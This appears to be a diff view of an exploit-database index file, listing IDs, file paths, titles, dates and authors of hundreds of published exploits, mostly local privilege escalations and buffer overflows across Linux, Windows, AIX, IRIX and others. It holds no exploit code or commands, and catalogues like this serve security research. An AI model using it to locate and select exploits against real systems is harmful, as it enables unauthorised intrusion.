19602,exploits/linux/local/19602.c,"Eric Allman Sendmail 8.8.x - Socket Hijack",1999-11-05,"Michal Zalewski",local,linux,
19300,exploits/aix/local/19300.txt,"IBM AIX 4.2.1 - 'snap' Insecure Temporary File Creation",1999-02-17,"Larry W. Cashdollar",local,aix,
19302,exploits/linux/local/19302.c,"Linux libc 5.3.12 / RedHat Linux 4.0 / Slackware Linux 3.1 - libc NLSPATH",1998-01-19,Solar,local,linux,
19302,exploits/linux/local/19302.c,"Linux libc 5.3.12 (RedHat Linux 4.0 / Slackware Linux 3.1) - libc NLSPATH",1998-01-19,Solar,local,linux,
19304,exploits/irix/local/19304.txt,"SGI IRIX 6.4 - 'inpview' Local Privilege Escalation",1997-05-07,"Yuri Volobuev",local,irix,
19305,exploits/linux/local/19305.c,"RedHat Linux 5.0 - 'msgchk' Local Privilege Escalation",1998-01-19,"Cesar Tascon Alvarez",local,linux,
19306,exploits/aix/local/19306.c,"IBM AIX 4.2.1 - '/usr/bin/portmir' Local Buffer Overflow / Insecure Temporary File Creation",1997-10-29,"BM ERS Team",local,aix,
@ -7635,7 +7638,7 @@ id,file,description,date,author,type,platform,port
19356,exploits/irix/local/19356.txt,"SGI IRIX 6.3 - 'Systour' / 'OutOfBox' Local Privilege Escalation",1996-10-30,"Tun-Hui Hu",local,irix,
19358,exploits/irix/local/19358.txt,"SGI IRIX 6.4 - 'xfsdump' Local Privilege Escalation",1997-05-07,"Yuri Volobuev",local,irix,
19359,exploits/windows/local/19359.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4 / NT 3.5.1/SP1/SP2/SP3/SP4/SP5 - Screensaver",1999-03-10,"Cybermedia Software Private Limited",local,windows,
19360,exploits/linux/local/19360.c,"Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - 'vsyslog()' Local Buffer Overflow",1997-12-21,"Solar Designer",local,linux,
19360,exploits/linux/local/19360.c,"Linux libc 5.3.12/5.4 (RedHat Linux 4.0) - 'vsyslog()' Local Buffer Overflow",1997-12-21,"Solar Designer",local,linux,
19362,exploits/sco/local/19362.c,"SCO Open Server 5.0.5 - XBase Buffer Overflow",1999-06-14,doble,local,sco,
19384,exploits/linux/local/19384.c,"Debian 2.1 - Print Queue Control",1999-07-02,"Chris Leishman",local,linux,
19370,exploits/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x/5.0 - Local Buffer Overflow",1999-06-25,KSR[T],local,linux,
@ -8013,7 +8016,7 @@ id,file,description,date,author,type,platform,port
20906,exploits/unix/local/20906.c,"kosch suid wrapper 1.1.1 - Local Buffer Overflow",2001-06-07,dex,local,unix,
20915,exploits/windows/local/20915.py,"ActFax Server 4.31 Build 0225 - Local Privilege Escalation",2012-08-29,"Craig Freyman",local,windows,
20923,exploits/unix/local/20923.c,"LPRng 3.6.x - Failure To Drop Supplementary Groups",2001-06-07,zen-parse,local,unix,
20926,exploits/linux/local/20926.txt,"Linux 6.1/6.2/7.0/7.1 Man Page - Source Buffer Overflow",2001-06-12,zen-parse,local,linux,
20926,exploits/linux/local/20926.txt,"Linux Man Page 6.1/6.2/7.0/7.1- Source Buffer Overflow",2001-06-12,zen-parse,local,linux,
20927,exploits/linux/local/20927.c,"BestCrypt 0.6/0.7/0.8 - BCTool UMount Buffer Overflow",2001-06-14,"Carl Livitt",local,linux,
20928,exploits/linux/local/20928.sh,"Rxvt 2.6.1/2.6.2 - Local Buffer Overflow",2001-06-15,MasterSecuritY,local,linux,
20937,exploits/irix/local/20937.c,"SGI Performance Co-Pilot 2.1.x/2.2 - pmpost Symbolic Link",2001-06-18,IhaQueR,local,irix,
@ -8403,7 +8406,7 @@ id,file,description,date,author,type,platform,port
23611,exploits/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",local,multiple,
23634,exploits/linux/local/23634.c,"0verkill 0.16 - Game Client Multiple Local Buffer Overflow Vulnerabilities",2004-02-02,pi3ki31ny,local,linux,
23655,exploits/bsd/local/23655.txt,"BSD - SHMAT System Call Privilege Escalation",2004-02-05,"Joost Pol",local,bsd,
23658,exploits/linux/local/23658.c,"Linux VServer Project 1.2x - CHRoot Breakout",2004-02-06,"Markus Mueller",local,linux,
23658,exploits/linux/local/23658.c,"Linux VServer Project 1.2x - Chroot Breakout",2004-02-06,"Markus Mueller",local,linux,
23674,exploits/linux/local/23674.txt,"Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation",2004-02-09,"Martin Fiala",local,linux,
23682,exploits/linux/local/23682.c,"XFree86 4.3 - Font Information File Buffer Overflow",2004-11-10,bender2@lonestar.org,local,linux,
23738,exploits/linux/local/23738.c,"LGames LBreakout2 2.2.2 - Multiple Environment Variable Buffer Overflow Vulnerabilities",2004-02-21,Li0n7,local,linux,
@ -8978,8 +8981,8 @@ id,file,description,date,author,type,platform,port
37825,exploits/osx/local/37825.txt,"Apple Mac OSX 10.10.5 - 'XNU' Local Privilege Escalation",2015-08-18,kpwn,local,osx,
37710,exploits/linux/local/37710.txt,"Sudo 1.8.14 (RHEL 5/6/7 / Ubuntu) - 'Sudoedit' Unauthorized Privilege Escalation",2015-07-28,"daniel svartman",local,linux,
37716,exploits/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",local,windows,
37722,exploits/linux_x86-64/local/37722.c,"Linux espfix64 - Nested NMIs Interrupting Privilege Escalation",2015-08-05,"Andrew Lutomirski",local,linux_x86-64,
37724,exploits/linux_x86/local/37724.asm,"Linux (x86) - Memory Sinkhole Privilege Escalation",2015-08-07,"Christopher Domas",local,linux_x86,
37722,exploits/linux_x86-64/local/37722.c,"Linux Kernel - 'espfix64' Nested NMIs Interrupting Privilege Escalation",2015-08-05,"Andrew Lutomirski",local,linux_x86-64,
37724,exploits/linux_x86/local/37724.asm,"Linux Kernel (x86) - Memory Sinkhole Privilege Escalation",2015-08-07,"Christopher Domas",local,linux_x86,
37730,exploits/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - '.m3u' Local Buffer Overflow (SEH)",2015-08-07,"Saeid Atabaki",local,windows,
37732,exploits/windows_x86/local/37732.c,"Microsoft Windows XP SP3 (x86) / 2003 SP2 (x86) - 'NDProxy' Local Privilege Escalation (MS14-002)",2015-08-07,"Tomislav Paskalev",local,windows_x86,
38106,exploits/aix/local/38106.txt,"IBM AIX High Availability Cluster Multiprocessing (HACMP) - Local Privilege Escalation",2015-09-08,"Kristian Erik Hermansen",local,aix,
@ -9046,7 +9049,7 @@ id,file,description,date,author,type,platform,port
38452,exploits/windows/local/38452.txt,"CDex Genre 1.79 - Local Stack Buffer Overflow",2015-10-13,Un_N0n,local,windows,
38467,exploits/windows/local/38467.py,"AdobeWorkgroupHelper 2.8.3.3 - Local Stack Buffer Overflow",2015-10-15,hyp3rlinx,local,windows,
38472,exploits/windows/local/38472.py,"Blat 2.7.6 SMTP / NNTP Mailer - Local Buffer Overflow",2015-10-15,hyp3rlinx,local,windows,
38473,exploits/linux/local/38473.py,"Linux 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass",2015-10-15,soyer,local,linux,
38473,exploits/linux/local/38473.py,"Linux Kernel 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass",2015-10-15,soyer,local,linux,
38474,exploits/windows/local/38474.txt,"Microsoft Windows 10 - Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",local,windows,
38486,exploits/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - Local Stack Overflow (SEH)",2015-10-18,"yokoacc_ nudragn_ rungga_reksya",local,windows,
38504,exploits/windows/local/38504.py,"HandyPassword 4.9.3 - Overwrite (SEH)",2015-10-21,Un_N0n,local,windows,
@ -9171,7 +9174,7 @@ id,file,description,date,author,type,platform,port
40054,exploits/linux/local/40054.c,"Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation",2016-07-04,halfdog,local,linux,
39980,exploits/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - Local Stack Overflow (SEH) (Metasploit)",2016-06-20,s0nk3y,local,windows,
39984,exploits/windows_x86-64/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,local,windows_x86-64,
39992,exploits/linux/local/39992.md,"Linux - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation",2016-06-21,"Google Security Research",local,linux,
39992,exploits/linux/local/39992.md,"Linux Kernel - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation",2016-06-21,"Google Security Research",local,linux,
40017,exploits/windows/local/40017.py,"Mediacoder 0.8.43.5830 - '.m3u' Local Buffer Overflow (SEH)",2016-06-27,"Sibusiso Sishi",local,windows,
40018,exploits/windows/local/40018.py,"VUPlayer 2.49 (Windows 7) - '.m3u' Local Buffer Overflow (DEP Bypass)",2016-06-27,secfigo,local,windows,
40020,exploits/windows/local/40020.txt,"Panda Security (Multiple Products) - Local Privilege Escalation",2016-06-27,Security-Assessment.com,local,windows,
@ -9590,6 +9593,12 @@ id,file,description,date,author,type,platform,port
44270,exploits/windows/local/44270.txt,"WebLog Expert Enterprise 9.4 - Authentication Bypass",2018-03-09,hyp3rlinx,local,windows,
44279,exploits/linux/local/44279.py,"SC 7.16 - Stack-Based Buffer Overflow",2018-03-12,"Juan Sacco",local,linux,
44282,exploits/hardware/local/44282.txt,"Sony Playstation 4 (PS4) 4.55 < 5.50 - WebKit Code Execution (PoC)",2018-03-10,qwertyoruiop,local,hardware,
44298,exploits/linux/local/44298.c,"Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation",2018-03-16,"Bruce Leidl",local,linux,
44299,exploits/linux/local/44299.c,"Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation",2018-03-19,"Vitaly Nikolenko",local,linux,
44300,exploits/linux/local/44300.c,"Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation",2018-03-19,"Vitaly Nikolenko",local,linux,
44302,exploits/linux/local/44302.c,"Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation",2017-10-16,"Jeremy Huang",local,linux,
44303,exploits/linux/local/44303.c,"Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation",2017-12-11,anonymous,local,linux,
44306,exploits/hardware/local/44306.c,"Huawei Mate 7 - '/dev/hifi_misc' Privilege Escalation",2016-01-24,pray3r,local,hardware,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139

Can't render this file because it is too large.